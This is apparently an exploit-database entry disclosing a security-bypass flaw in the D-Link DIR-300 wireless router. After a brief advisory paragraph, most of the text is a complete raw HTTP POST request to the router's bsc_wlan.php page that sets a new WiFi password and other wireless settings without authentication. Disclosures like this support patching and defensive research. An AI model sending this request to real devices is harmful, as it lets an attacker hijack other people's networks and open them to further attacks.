D-Link DIR-300 - WiFi Key Security Bypass

Author: Gaurav Saha
type: remote
platform: hardware
port: 
date_added: 2010-11-24 
date_updated: 2014-10-20 
verified: 1 
codes: OSVDB-75178 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/45038/info

The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability.

Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks.

POST http://www.example.com/bsc_wlan.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive

Content-Type: application/x-www-form-urlencoded
Content-Length: 1000

ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1=